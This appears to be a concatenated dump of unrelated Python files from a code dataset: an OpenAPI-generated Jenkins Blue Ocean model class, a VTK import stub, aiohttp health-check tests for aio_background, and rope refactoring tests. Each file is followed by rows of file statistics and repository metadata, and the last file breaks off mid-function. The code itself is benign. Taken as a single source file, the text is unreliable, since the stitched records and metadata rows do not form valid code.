def __init__(self, io_jenkins_blueocean_service_embedded_rest_pipeline_impl: ExtensionClassImpl=None, io_jenkins_blueocean_service_embedded_rest_multi_branch_pipeline_impl: ExtensionClassImpl=None, _class: str=None): # noqa: E501
"""ExtensionClassContainerImpl1map - a model defined in OpenAPI
:param io_jenkins_blueocean_service_embedded_rest_pipeline_impl: The io_jenkins_blueocean_service_embedded_rest_pipeline_impl of this ExtensionClassContainerImpl1map. # noqa: E501
:type io_jenkins_blueocean_service_embedded_rest_pipeline_impl: ExtensionClassImpl
:param io_jenkins_blueocean_service_embedded_rest_multi_branch_pipeline_impl: The io_jenkins_blueocean_service_embedded_rest_multi_branch_pipeline_impl of this ExtensionClassContainerImpl1map. # noqa: E501
:type io_jenkins_blueocean_service_embedded_rest_multi_branch_pipeline_impl: ExtensionClassImpl
:param _class: The _class of this ExtensionClassContainerImpl1map. # noqa: E501
:type _class: str
"""
self.openapi_types = {
'io_jenkins_blueocean_service_embedded_rest_pipeline_impl': ExtensionClassImpl,
'io_jenkins_blueocean_service_embedded_rest_multi_branch_pipeline_impl': ExtensionClassImpl,
'_class': str
}
self.attribute_map = {
'io_jenkins_blueocean_service_embedded_rest_pipeline_impl': 'io.jenkins.blueocean.service.embedded.rest.PipelineImpl',
'io_jenkins_blueocean_service_embedded_rest_multi_branch_pipeline_impl': 'io.jenkins.blueocean.service.embedded.rest.MultiBranchPipelineImpl',
'_class': '_class'
}
self._io_jenkins_blueocean_service_embedded_rest_pipeline_impl = io_jenkins_blueocean_service_embedded_rest_pipeline_impl
self._io_jenkins_blueocean_service_embedded_rest_multi_branch_pipeline_impl = io_jenkins_blueocean_service_embedded_rest_multi_branch_pipeline_impl
self.__class = _class
@classmethod
def from_dict(cls, dikt) -> 'ExtensionClassContainerImpl1map':
"""Returns the dict as a model
:param dikt: A dict.
:type: dict
:return: The ExtensionClassContainerImpl1map of this ExtensionClassContainerImpl1map. # noqa: E501
:rtype: ExtensionClassContainerImpl1map
"""
return util.deserialize_model(dikt, cls)
@property
def io_jenkins_blueocean_service_embedded_rest_pipeline_impl(self) -> ExtensionClassImpl:
"""Gets the io_jenkins_blueocean_service_embedded_rest_pipeline_impl of this ExtensionClassContainerImpl1map.
:return: The io_jenkins_blueocean_service_embedded_rest_pipeline_impl of this ExtensionClassContainerImpl1map.
:rtype: ExtensionClassImpl
"""
return self._io_jenkins_blueocean_service_embedded_rest_pipeline_impl
@io_jenkins_blueocean_service_embedded_rest_pipeline_impl.setter
def io_jenkins_blueocean_service_embedded_rest_pipeline_impl(self, io_jenkins_blueocean_service_embedded_rest_pipeline_impl: ExtensionClassImpl):
"""Sets the io_jenkins_blueocean_service_embedded_rest_pipeline_impl of this ExtensionClassContainerImpl1map.
:param io_jenkins_blueocean_service_embedded_rest_pipeline_impl: The io_jenkins_blueocean_service_embedded_rest_pipeline_impl of this ExtensionClassContainerImpl1map.
:type io_jenkins_blueocean_service_embedded_rest_pipeline_impl: ExtensionClassImpl
"""
self._io_jenkins_blueocean_service_embedded_rest_pipeline_impl = io_jenkins_blueocean_service_embedded_rest_pipeline_impl
@property
def io_jenkins_blueocean_service_embedded_rest_multi_branch_pipeline_impl(self) -> ExtensionClassImpl:
"""Gets the io_jenkins_blueocean_service_embedded_rest_multi_branch_pipeline_impl of this ExtensionClassContainerImpl1map.
:return: The io_jenkins_blueocean_service_embedded_rest_multi_branch_pipeline_impl of this ExtensionClassContainerImpl1map.
:rtype: ExtensionClassImpl
"""
return self._io_jenkins_blueocean_service_embedded_rest_multi_branch_pipeline_impl
@io_jenkins_blueocean_service_embedded_rest_multi_branch_pipeline_impl.setter
def io_jenkins_blueocean_service_embedded_rest_multi_branch_pipeline_impl(self, io_jenkins_blueocean_service_embedded_rest_multi_branch_pipeline_impl: ExtensionClassImpl):
"""Sets the io_jenkins_blueocean_service_embedded_rest_multi_branch_pipeline_impl of this ExtensionClassContainerImpl1map.
:param io_jenkins_blueocean_service_embedded_rest_multi_branch_pipeline_impl: The io_jenkins_blueocean_service_embedded_rest_multi_branch_pipeline_impl of this ExtensionClassContainerImpl1map.
:type io_jenkins_blueocean_service_embedded_rest_multi_branch_pipeline_impl: ExtensionClassImpl
"""
self._io_jenkins_blueocean_service_embedded_rest_multi_branch_pipeline_impl = io_jenkins_blueocean_service_embedded_rest_multi_branch_pipeline_impl
@property
def _class(self) -> str:
"""Gets the _class of this ExtensionClassContainerImpl1map.
:return: The _class of this ExtensionClassContainerImpl1map.
:rtype: str
"""
return self.__class
@_class.setter
def _class(self, _class: str):
"""Sets the _class of this ExtensionClassContainerImpl1map.
:param _class: The _class of this ExtensionClassContainerImpl1map.
:type _class: str
"""
self.__class = _class
| 50.932203 | 234 | 0.800166 | 679 | 6,010 | 6.512518 | 0.113402 | 0.089552 | 0.179104 | 0.248756 | 0.794437 | 0.752374 | 0.749661 | 0.724785 | 0.721167 | 0.706015 | 0 | 0.009625 | 0.152912 | 6,010 | 117 | 235 | 51.367521 | 0.858967 | 0.446256 | 0 | 0.214286 | 0 | 0 | 0.139027 | 0.133069 | 0 | 0 | 0 | 0 | 0 | 1 | 0.190476 | false | 0 | 0.142857 | 0 | 0.452381 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
162a3ac467a9a6c1ac17d3bf5e2cf46b0025c46b | 31 | py | Python | Utilities/VTKPythonWrapping/paraview/vtk/imaging.py | cjh1/ParaView | b0eba067c87078d5fe56ec3cb21447f149e1f31a | ["BSD-3-Clause"] | 17 | 2015-02-17T00:30:26.000Z | 2022-03-17T06:13:02.000Z | Utilities/VTKPythonWrapping/paraview/vtk/imaging.py | cjh1/ParaView | b0eba067c87078d5fe56ec3cb21447f149e1f31a | ["BSD-3-Clause"] | null | null | null | Utilities/VTKPythonWrapping/paraview/vtk/imaging.py | cjh1/ParaView | b0eba067c87078d5fe56ec3cb21447f149e1f31a | ["BSD-3-Clause"] | 10 | 2015-08-31T18:20:17.000Z | 2022-02-02T15:16:21.000Z | from vtkImagingPython import *
| 15.5 | 30 | 0.83871 | 3 | 31 | 8.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.129032 | 31 | 1 | 31 | 31 | 0.962963 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
16325f943d26febe35c10257dfffcf997ed360a7 | 3424 | py | Python | tests/test_aiohttp.py | anna-money/aio-background | 5b72dd7e681abab7fe85df129ea4fa5ca2cf6dc7 | ["MIT"] | 7 | 2021-11-05T08:02:50.000Z | 2021-11-16T08:58:06.000Z | tests/test_aiohttp.py | Pliner/aio-background | 8498d496707cabecee592008ea322c68b0eb29ad | ["MIT"] | 16 | 2021-11-15T09:54:51.000Z | 2022-03-17T00:31:52.000Z | tests/test_aiohttp.py | Pliner/aio-background | 8498d496707cabecee592008ea322c68b0eb29ad | ["MIT"] | null | null | null | import asyncio
import aiohttp.web
import aiohttp.web_request
import aiohttp.web_response
import pytest
import yarl
import aio_background
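# the fixtures below expose "/" as a health endpoint backed by
# aio_background.aiohttp_is_healthy; fixtures with jobs attach them to the
# app lifecycle through aio_background.aiohttp_setup_ctx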
@pytest.fixture
async def server_without_jobs(aiohttp_client):
async def health_check(request: aiohttp.web_request.Request) -> aiohttp.web_response.Response:
is_healthy = aio_background.aiohttp_is_healthy(request.app)
return aiohttp.web_response.Response(status=200 if is_healthy else 500)
app = aiohttp.web.Application()
app.router.add_get("/", health_check)
return await aiohttp_client(app)
@pytest.fixture
async def server_with_job(aiohttp_client):
async def run() -> None:
await asyncio.sleep(100500)
async def health_check(request: aiohttp.web_request.Request) -> aiohttp.web_response.Response:
is_healthy = aio_background.aiohttp_is_healthy(request.app)
return aiohttp.web_response.Response(status=200 if is_healthy else 500)
app = aiohttp.web.Application()
app.router.add_get("/", health_check)
app.cleanup_ctx.append(aio_background.aiohttp_setup_ctx(aio_background.run(run)))
return await aiohttp_client(app)
@pytest.fixture
async def server_with_healthy_job(aiohttp_client):
async def run() -> None:
await asyncio.sleep(100500)
async def health_check(request: aiohttp.web_request.Request) -> aiohttp.web_response.Response:
is_healthy = aio_background.aiohttp_is_healthy(request.app)
return aiohttp.web_response.Response(status=200 if is_healthy else 500)
app = aiohttp.web.Application()
app.router.add_get("/", health_check)
app.cleanup_ctx.append(aio_background.aiohttp_setup_ctx(aio_background.run(run)))
return await aiohttp_client(app)
@pytest.fixture
async def server_with_unhealthy_job(aiohttp_client):
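    # the job raises after 0.5s, so the health endpoint should flip from 200 to 500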
async def run() -> None:
await asyncio.sleep(0.5)
raise RuntimeError("Oops")
async def health_check(request: aiohttp.web_request.Request) -> aiohttp.web_response.Response:
is_healthy = aio_background.aiohttp_is_healthy(request.app)
return aiohttp.web_response.Response(status=200 if is_healthy else 500)
app = aiohttp.web.Application()
app.router.add_get("/", health_check)
app.cleanup_ctx.append(aio_background.aiohttp_setup_ctx(aio_background.run(run)))
return await aiohttp_client(app)
async def test_aiohttp_without_jobs(server_without_jobs):
async with aiohttp.ClientSession() as client_session:
url = yarl.URL(f"http://{server_without_jobs.server.host}:{server_without_jobs.server.port}")
response = await client_session.get(url)
assert response.status == 200
async def test_aiohttp_with_healthy_job(server_with_healthy_job):
async with aiohttp.ClientSession() as client_session:
url = yarl.URL(f"http://{server_with_healthy_job.server.host}:{server_with_healthy_job.server.port}")
response = await client_session.get(url)
assert response.status == 200
async def test_aiohttp_with_unhealthy_job(server_with_unhealthy_job):
async with aiohttp.ClientSession() as client_session:
url = yarl.URL(f"http://{server_with_unhealthy_job.server.host}:{server_with_unhealthy_job.server.port}")
response = await client_session.get(url)
assert response.status == 200
await asyncio.sleep(1)
response = await client_session.get(url)
assert response.status == 500
| 37.626374 | 113 | 0.749416 | 466 | 3,424 | 5.244635 | 0.128755 | 0.077741 | 0.066285 | 0.085106 | 0.859247 | 0.816285 | 0.816285 | 0.816285 | 0.816285 | 0.795008 | 0 | 0.017623 | 0.15479 | 3,424 | 90 | 114 | 38.044444 | 0.826883 | 0 | 0 | 0.686567 | 0 | 0 | 0.073014 | 0 | 0 | 0 | 0 | 0 | 0.059701 | 1 | 0 | false | 0 | 0.104478 | 0 | 0.223881 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
167f7984d254f4be25e2554d9f39807e0827d542 | 42781 | py | Python | leo/external/rope/ropetest/refactor/extracttest.py | frakel/leo-editor | b574118ee3b7ffe8344fa0d00dac603096117ac7 | ["MIT"] | null | null | null | leo/external/rope/ropetest/refactor/extracttest.py | frakel/leo-editor | b574118ee3b7ffe8344fa0d00dac603096117ac7 | ["MIT"] | null | null | null | leo/external/rope/ropetest/refactor/extracttest.py | frakel/leo-editor | b574118ee3b7ffe8344fa0d00dac603096117ac7 | ["MIT"] | null | null | null | try:
import unittest2 as unittest
except ImportError:
import unittest
import rope.base.codeanalyze
import rope.base.exceptions
from rope.refactor import extract
from ropetest import testutils
class ExtractMethodTest(unittest.TestCase):
def setUp(self):
super(ExtractMethodTest, self).setUp()
self.project = testutils.sample_project()
self.pycore = self.project.pycore
def tearDown(self):
testutils.remove_project(self.project)
super(ExtractMethodTest, self).tearDown()
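    # helpers: write the snippet into a scratch module, run the extract
    # refactoring over the given character offsets, apply the change set,
    # and return the rewritten source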
def do_extract_method(self, source_code, start, end, extracted, **kwds):
testmod = testutils.create_module(self.project, 'testmod')
testmod.write(source_code)
extractor = extract.ExtractMethod(
self.project, testmod, start, end)
self.project.do(extractor.get_changes(extracted, **kwds))
return testmod.read()
def do_extract_variable(self, source_code, start, end, extracted, **kwds):
testmod = testutils.create_module(self.project, 'testmod')
testmod.write(source_code)
extractor = extract.ExtractVariable(self.project, testmod, start, end)
self.project.do(extractor.get_changes(extracted, **kwds))
return testmod.read()
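    # map an inclusive 1-based line range onto character offsets that cover
    # whole lines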
def _convert_line_range_to_offset(self, code, start, end):
lines = rope.base.codeanalyze.SourceLinesAdapter(code)
return lines.get_line_start(start), lines.get_line_end(end)
def test_simple_extract_function(self):
code = "def a_func():\n print('one')\n print('two')\n"
start, end = self._convert_line_range_to_offset(code, 2, 2)
refactored = self.do_extract_method(code, start, end, 'extracted')
expected = "def a_func():\n extracted()\n print('two')\n\n" \
"def extracted():\n print('one')\n"
self.assertEquals(expected, refactored)
def test_extract_function_at_the_end_of_file(self):
code = "def a_func():\n print('one')"
start, end = self._convert_line_range_to_offset(code, 2, 2)
refactored = self.do_extract_method(code, start, end, 'extracted')
expected = "def a_func():\n extracted()\n" \
"def extracted():\n print('one')\n"
self.assertEquals(expected, refactored)
def test_extract_function_after_scope(self):
code = "def a_func():\n print('one')\n print('two')" \
"\n\nprint('hey')\n"
start, end = self._convert_line_range_to_offset(code, 2, 2)
refactored = self.do_extract_method(code, start, end, 'extracted')
expected = "def a_func():\n extracted()\n print('two')\n\n" \
"def extracted():\n print('one')\n\nprint('hey')\n"
self.assertEquals(expected, refactored)
def test_simple_extract_function_with_parameter(self):
code = "def a_func():\n a_var = 10\n print(a_var)\n"
start, end = self._convert_line_range_to_offset(code, 3, 3)
refactored = self.do_extract_method(code, start, end, 'new_func')
expected = "def a_func():\n a_var = 10\n new_func(a_var)\n\n" \
"def new_func(a_var):\n print(a_var)\n"
self.assertEquals(expected, refactored)
def test_not_unread_variables_as_parameter(self):
code = "def a_func():\n a_var = 10\n print('hey')\n"
start, end = self._convert_line_range_to_offset(code, 3, 3)
refactored = self.do_extract_method(code, start, end, 'new_func')
expected = "def a_func():\n a_var = 10\n new_func()\n\n" \
"def new_func():\n print('hey')\n"
self.assertEquals(expected, refactored)
def test_simple_extract_function_with_two_parameter(self):
code = 'def a_func():\n a_var = 10\n another_var = 20\n' \
' third_var = a_var + another_var\n'
start, end = self._convert_line_range_to_offset(code, 4, 4)
refactored = self.do_extract_method(code, start, end, 'new_func')
expected = 'def a_func():\n a_var = 10\n another_var = 20\n' \
' new_func(a_var, another_var)\n\n' \
'def new_func(a_var, another_var):\n' \
' third_var = a_var + another_var\n'
self.assertEquals(expected, refactored)
def test_simple_extract_function_with_return_value(self):
code = 'def a_func():\n a_var = 10\n print(a_var)\n'
start, end = self._convert_line_range_to_offset(code, 2, 2)
refactored = self.do_extract_method(code, start, end, 'new_func')
expected = 'def a_func():\n a_var = new_func()' \
'\n print(a_var)\n\n' \
'def new_func():\n a_var = 10\n return a_var\n'
self.assertEquals(expected, refactored)
def test_extract_function_with_multiple_return_values(self):
code = 'def a_func():\n a_var = 10\n another_var = 20\n' \
' third_var = a_var + another_var\n'
start, end = self._convert_line_range_to_offset(code, 2, 3)
refactored = self.do_extract_method(code, start, end, 'new_func')
expected = 'def a_func():\n a_var, another_var = new_func()\n' \
' third_var = a_var + another_var\n\n' \
'def new_func():\n a_var = 10\n another_var = 20\n' \
' return a_var, another_var\n'
self.assertEquals(expected, refactored)
def test_simple_extract_method(self):
code = 'class AClass(object):\n\n' \
' def a_func(self):\n print(1)\n print(2)\n'
start, end = self._convert_line_range_to_offset(code, 4, 4)
refactored = self.do_extract_method(code, start, end, 'new_func')
expected = 'class AClass(object):\n\n' \
' def a_func(self):\n' \
' self.new_func()\n' \
' print(2)\n\n' \
' def new_func(self):\n print(1)\n'
self.assertEquals(expected, refactored)
def test_extract_method_with_args_and_returns(self):
code = 'class AClass(object):\n' \
' def a_func(self):\n' \
' a_var = 10\n' \
' another_var = a_var * 3\n' \
' third_var = a_var + another_var\n'
start, end = self._convert_line_range_to_offset(code, 4, 4)
refactored = self.do_extract_method(code, start, end, 'new_func')
expected = 'class AClass(object):\n' \
' def a_func(self):\n' \
' a_var = 10\n' \
' another_var = self.new_func(a_var)\n' \
' third_var = a_var + another_var\n\n' \
' def new_func(self, a_var):\n' \
' another_var = a_var * 3\n' \
' return another_var\n'
self.assertEquals(expected, refactored)
def test_extract_method_with_self_as_argument(self):
code = 'class AClass(object):\n' \
' def a_func(self):\n' \
' print(self)\n'
start, end = self._convert_line_range_to_offset(code, 3, 3)
refactored = self.do_extract_method(code, start, end, 'new_func')
expected = 'class AClass(object):\n' \
' def a_func(self):\n' \
' self.new_func()\n\n' \
' def new_func(self):\n' \
' print(self)\n'
self.assertEquals(expected, refactored)
def test_extract_method_with_no_self_as_argument(self):
code = 'class AClass(object):\n' \
' def a_func():\n' \
' print(1)\n'
start, end = self._convert_line_range_to_offset(code, 3, 3)
with self.assertRaises(rope.base.exceptions.RefactoringError):
self.do_extract_method(code, start, end, 'new_func')
def test_extract_method_with_multiple_methods(self):
code = 'class AClass(object):\n' \
' def a_func(self):\n' \
' print(self)\n\n' \
' def another_func(self):\n' \
' pass\n'
start, end = self._convert_line_range_to_offset(code, 3, 3)
refactored = self.do_extract_method(code, start, end, 'new_func')
expected = 'class AClass(object):\n' \
' def a_func(self):\n' \
' self.new_func()\n\n' \
' def new_func(self):\n' \
' print(self)\n\n' \
' def another_func(self):\n' \
' pass\n'
self.assertEquals(expected, refactored)
def test_extract_function_with_function_returns(self):
code = 'def a_func():\n def inner_func():\n pass\n' \
' inner_func()\n'
start, end = self._convert_line_range_to_offset(code, 2, 3)
refactored = self.do_extract_method(code, start, end, 'new_func')
expected = 'def a_func():\n' \
' inner_func = new_func()\n inner_func()\n\n' \
'def new_func():\n' \
' def inner_func():\n pass\n' \
' return inner_func\n'
self.assertEquals(expected, refactored)
def test_simple_extract_global_function(self):
code = "print('one')\nprint('two')\nprint('three')\n"
start, end = self._convert_line_range_to_offset(code, 2, 2)
refactored = self.do_extract_method(code, start, end, 'new_func')
expected = "print('one')\n\ndef new_func():\n print('two')\n" \
"\nnew_func()\nprint('three')\n"
self.assertEquals(expected, refactored)
def test_extract_global_function_inside_ifs(self):
code = 'if True:\n a = 10\n'
start, end = self._convert_line_range_to_offset(code, 2, 2)
refactored = self.do_extract_method(code, start, end, 'new_func')
expected = '\ndef new_func():\n a = 10\n\nif True:\n' \
' new_func()\n'
self.assertEquals(expected, refactored)
def test_extract_function_while_inner_function_reads(self):
code = 'def a_func():\n a_var = 10\n' \
' def inner_func():\n print(a_var)\n' \
' return inner_func\n'
start, end = self._convert_line_range_to_offset(code, 3, 4)
refactored = self.do_extract_method(code, start, end, 'new_func')
expected = 'def a_func():\n a_var = 10\n' \
' inner_func = new_func(a_var)' \
'\n return inner_func\n\n' \
'def new_func(a_var):\n' \
' def inner_func():\n print(a_var)\n' \
' return inner_func\n'
self.assertEquals(expected, refactored)
def test_extract_method_bad_range(self):
code = "def a_func():\n pass\na_var = 10\n"
start, end = self._convert_line_range_to_offset(code, 2, 3)
with self.assertRaises(rope.base.exceptions.RefactoringError):
self.do_extract_method(code, start, end, 'new_func')
def test_extract_method_bad_range2(self):
code = "class AClass(object):\n pass\n"
start, end = self._convert_line_range_to_offset(code, 1, 1)
with self.assertRaises(rope.base.exceptions.RefactoringError):
self.do_extract_method(code, start, end, 'new_func')
def test_extract_method_containing_return(self):
code = 'def a_func(arg):\n if arg:\n return arg * 2' \
'\n return 1'
start, end = self._convert_line_range_to_offset(code, 2, 4)
with self.assertRaises(rope.base.exceptions.RefactoringError):
self.do_extract_method(code, start, end, 'new_func')
def test_extract_method_containing_yield(self):
code = "def a_func(arg):\n yield arg * 2\n"
start, end = self._convert_line_range_to_offset(code, 2, 2)
with self.assertRaises(rope.base.exceptions.RefactoringError):
self.do_extract_method(code, start, end, 'new_func')
def test_extract_method_containing_uncomplete_lines(self):
code = 'a_var = 20\nanother_var = 30\n'
start = code.index('20')
end = code.index('30') + 2
with self.assertRaises(rope.base.exceptions.RefactoringError):
self.do_extract_method(code, start, end, 'new_func')
def test_extract_method_containing_uncomplete_lines2(self):
code = 'a_var = 20\nanother_var = 30\n'
start = code.index('20')
end = code.index('another') + 5
with self.assertRaises(rope.base.exceptions.RefactoringError):
self.do_extract_method(code, start, end, 'new_func')
    def test_extract_function_and_argument_as_parameter(self):
code = 'def a_func(arg):\n print(arg)\n'
start, end = self._convert_line_range_to_offset(code, 2, 2)
refactored = self.do_extract_method(code, start, end, 'new_func')
expected = 'def a_func(arg):\n new_func(arg)\n\n' \
'def new_func(arg):\n print(arg)\n'
self.assertEquals(expected, refactored)
def test_extract_function_and_end_as_the_start_of_a_line(self):
code = 'print("hey")\nif True:\n pass\n'
start = 0
end = code.index('\n') + 1
refactored = self.do_extract_method(code, start, end, 'new_func')
expected = '\ndef new_func():\n print("hey")\n\n' \
'new_func()\nif True:\n pass\n'
self.assertEquals(expected, refactored)
def test_extract_function_and_indented_blocks(self):
code = 'def a_func(arg):\n if True:\n' \
' if True:\n print(arg)\n'
start, end = self._convert_line_range_to_offset(code, 3, 4)
refactored = self.do_extract_method(code, start, end, 'new_func')
expected = 'def a_func(arg):\n ' \
'if True:\n new_func(arg)\n\n' \
'def new_func(arg):\n if True:\n print(arg)\n'
self.assertEquals(expected, refactored)
def test_extract_method_and_multi_line_headers(self):
code = 'def a_func(\n arg):\n print(arg)\n'
start, end = self._convert_line_range_to_offset(code, 3, 3)
refactored = self.do_extract_method(code, start, end, 'new_func')
expected = 'def a_func(\n arg):\n new_func(arg)\n\n' \
'def new_func(arg):\n print(arg)\n'
self.assertEquals(expected, refactored)
def test_single_line_extract_function(self):
code = 'a_var = 10 + 20\n'
start = code.index('10')
end = code.index('20') + 2
refactored = self.do_extract_method(code, start, end, 'new_func')
expected = "\ndef new_func():\n " \
"return 10 + 20\n\na_var = new_func()\n"
self.assertEquals(expected, refactored)
def test_single_line_extract_function2(self):
code = 'def a_func():\n a = 10\n b = a * 20\n'
start = code.rindex('a')
end = code.index('20') + 2
refactored = self.do_extract_method(code, start, end, 'new_func')
expected = 'def a_func():\n a = 10\n b = new_func(a)\n' \
'\ndef new_func(a):\n return a * 20\n'
self.assertEquals(expected, refactored)
def test_single_line_extract_method_and_logical_lines(self):
code = 'a_var = 10 +\\\n 20\n'
start = code.index('10')
end = code.index('20') + 2
refactored = self.do_extract_method(code, start, end, 'new_func')
expected = '\ndef new_func():\n ' \
'return 10 + 20\n\na_var = new_func()\n'
self.assertEquals(expected, refactored)
def test_single_line_extract_method_and_logical_lines2(self):
code = 'a_var = (10,\\\n 20)\n'
start = code.index('10') - 1
end = code.index('20') + 3
refactored = self.do_extract_method(code, start, end, 'new_func')
expected = '\ndef new_func():\n' \
' return (10, 20)\n\na_var = new_func()\n'
self.assertEquals(expected, refactored)
def test_single_line_extract_method(self):
code = "class AClass(object):\n\n" \
" def a_func(self):\n a = 10\n b = a * a\n"
start = code.rindex('=') + 2
end = code.rindex('a') + 1
refactored = self.do_extract_method(code, start, end, 'new_func')
expected = 'class AClass(object):\n\n' \
' def a_func(self):\n' \
' a = 10\n b = self.new_func(a)\n\n' \
' def new_func(self, a):\n return a * a\n'
self.assertEquals(expected, refactored)
def test_single_line_extract_function_if_condition(self):
code = 'if True:\n pass\n'
start = code.index('True')
end = code.index('True') + 4
refactored = self.do_extract_method(code, start, end, 'new_func')
expected = "\ndef new_func():\n return True\n\nif new_func():" \
"\n pass\n"
self.assertEquals(expected, refactored)
def test_unneeded_params(self):
code = 'class A(object):\n ' \
'def a_func(self):\n a_var = 10\n a_var += 2\n'
start = code.rindex('2')
end = code.rindex('2') + 1
refactored = self.do_extract_method(code, start, end, 'new_func')
expected = 'class A(object):\n' \
' def a_func(self):\n a_var = 10\n' \
' a_var += self.new_func()\n\n' \
' def new_func(self):\n return 2\n'
self.assertEquals(expected, refactored)
def test_breaks_and_continues_inside_loops(self):
code = 'def a_func():\n for i in range(10):\n continue\n'
start = code.index('for')
end = len(code) - 1
refactored = self.do_extract_method(code, start, end, 'new_func')
expected = 'def a_func():\n new_func()\n\n' \
'def new_func():\n' \
' for i in range(10):\n continue\n'
self.assertEquals(expected, refactored)
def test_breaks_and_continues_outside_loops(self):
code = 'def a_func():\n' \
' for i in range(10):\n a = i\n continue\n'
start = code.index('a = i')
end = len(code) - 1
with self.assertRaises(rope.base.exceptions.RefactoringError):
self.do_extract_method(code, start, end, 'new_func')
def test_variable_writes_followed_by_variable_reads_after_extraction(self):
code = 'def a_func():\n a = 1\n a = 2\n b = a\n'
start = code.index('a = 1')
end = code.index('a = 2') - 1
refactored = self.do_extract_method(code, start, end, 'new_func')
expected = 'def a_func():\n new_func()\n a = 2\n b = a\n\n' \
'def new_func():\n a = 1\n'
self.assertEquals(expected, refactored)
def test_var_writes_followed_by_var_reads_inside_extraction(self):
code = 'def a_func():\n a = 1\n a = 2\n b = a\n'
start = code.index('a = 2')
end = len(code) - 1
refactored = self.do_extract_method(code, start, end, 'new_func')
expected = 'def a_func():\n a = 1\n new_func()\n\n' \
'def new_func():\n a = 2\n b = a\n'
self.assertEquals(expected, refactored)
def test_extract_variable(self):
code = 'a_var = 10 + 20\n'
start = code.index('10')
end = code.index('20') + 2
refactored = self.do_extract_variable(code, start, end, 'new_var')
expected = 'new_var = 10 + 20\na_var = new_var\n'
self.assertEquals(expected, refactored)
def test_extract_variable_multiple_lines(self):
code = 'a = 1\nb = 2\n'
start = code.index('1')
end = code.index('1') + 1
refactored = self.do_extract_variable(code, start, end, 'c')
expected = 'c = 1\na = c\nb = 2\n'
self.assertEquals(expected, refactored)
def test_extract_variable_in_the_middle_of_statements(self):
code = 'a = 1 + 2\n'
start = code.index('1')
end = code.index('1') + 1
refactored = self.do_extract_variable(code, start, end, 'c')
expected = 'c = 1\na = c + 2\n'
self.assertEquals(expected, refactored)
def test_extract_variable_for_a_tuple(self):
code = 'a = 1, 2\n'
start = code.index('1')
end = code.index('2') + 1
refactored = self.do_extract_variable(code, start, end, 'c')
expected = 'c = 1, 2\na = c\n'
self.assertEquals(expected, refactored)
def test_extract_variable_for_a_string(self):
code = 'def a_func():\n a = "hey!"\n'
start = code.index('"')
end = code.rindex('"') + 1
refactored = self.do_extract_variable(code, start, end, 'c')
expected = 'def a_func():\n c = "hey!"\n a = c\n'
self.assertEquals(expected, refactored)
def test_extract_variable_inside_ifs(self):
code = 'if True:\n a = 1 + 2\n'
start = code.index('1')
end = code.rindex('2') + 1
refactored = self.do_extract_variable(code, start, end, 'b')
expected = 'if True:\n b = 1 + 2\n a = b\n'
self.assertEquals(expected, refactored)
def test_extract_variable_inside_ifs_and_logical_lines(self):
code = 'if True:\n a = (3 + \n(1 + 2))\n'
start = code.index('1')
end = code.index('2') + 1
refactored = self.do_extract_variable(code, start, end, 'b')
expected = 'if True:\n b = 1 + 2\n a = (3 + \n(b))\n'
self.assertEquals(expected, refactored)
# TODO: Handle when extracting a subexpression
def xxx_test_extract_variable_for_a_subexpression(self):
code = 'a = 3 + 1 + 2\n'
start = code.index('1')
end = code.index('2') + 1
refactored = self.do_extract_variable(code, start, end, 'b')
expected = 'b = 1 + 2\na = 3 + b\n'
self.assertEquals(expected, refactored)
def test_extract_variable_starting_from_the_start_of_the_line(self):
code = 'a_dict = {1: 1}\na_dict.values().count(1)\n'
start = code.rindex('a_dict')
end = code.index('count') - 1
refactored = self.do_extract_variable(code, start, end, 'values')
expected = 'a_dict = {1: 1}\n' \
'values = a_dict.values()\nvalues.count(1)\n'
self.assertEquals(expected, refactored)
def test_extract_variable_on_the_last_line_of_a_function(self):
code = 'def f():\n a_var = {}\n a_var.keys()\n'
start = code.rindex('a_var')
end = code.index('.keys')
refactored = self.do_extract_variable(code, start, end, 'new_var')
expected = 'def f():\n a_var = {}\n ' \
'new_var = a_var\n new_var.keys()\n'
self.assertEquals(expected, refactored)
def test_extract_variable_on_the_indented_function_statement(self):
code = 'def f():\n if True:\n a_var = 1 + 2\n'
start = code.index('1')
end = code.index('2') + 1
refactored = self.do_extract_variable(code, start, end, 'new_var')
expected = 'def f():\n if True:\n' \
' new_var = 1 + 2\n a_var = new_var\n'
self.assertEquals(expected, refactored)
def test_extract_method_on_the_last_line_of_a_function(self):
code = 'def f():\n a_var = {}\n a_var.keys()\n'
start = code.rindex('a_var')
end = code.index('.keys')
refactored = self.do_extract_method(code, start, end, 'new_f')
expected = 'def f():\n a_var = {}\n new_f(a_var).keys()\n\n' \
'def new_f(a_var):\n return a_var\n'
self.assertEquals(expected, refactored)
def test_raising_exception_when_on_incomplete_variables(self):
code = 'a_var = 10 + 20\n'
start = code.index('10') + 1
end = code.index('20') + 2
with self.assertRaises(rope.base.exceptions.RefactoringError):
self.do_extract_method(code, start, end, 'new_func')
def test_raising_exception_when_on_incomplete_variables_on_end(self):
code = 'a_var = 10 + 20\n'
start = code.index('10')
end = code.index('20') + 1
with self.assertRaises(rope.base.exceptions.RefactoringError):
self.do_extract_method(code, start, end, 'new_func')
def test_raising_exception_on_bad_parens(self):
code = 'a_var = (10 + 20) + 30\n'
start = code.index('20')
end = code.index('30') + 2
with self.assertRaises(rope.base.exceptions.RefactoringError):
self.do_extract_method(code, start, end, 'new_func')
def test_raising_exception_on_bad_operators(self):
code = 'a_var = 10 + 20 + 30\n'
start = code.index('10')
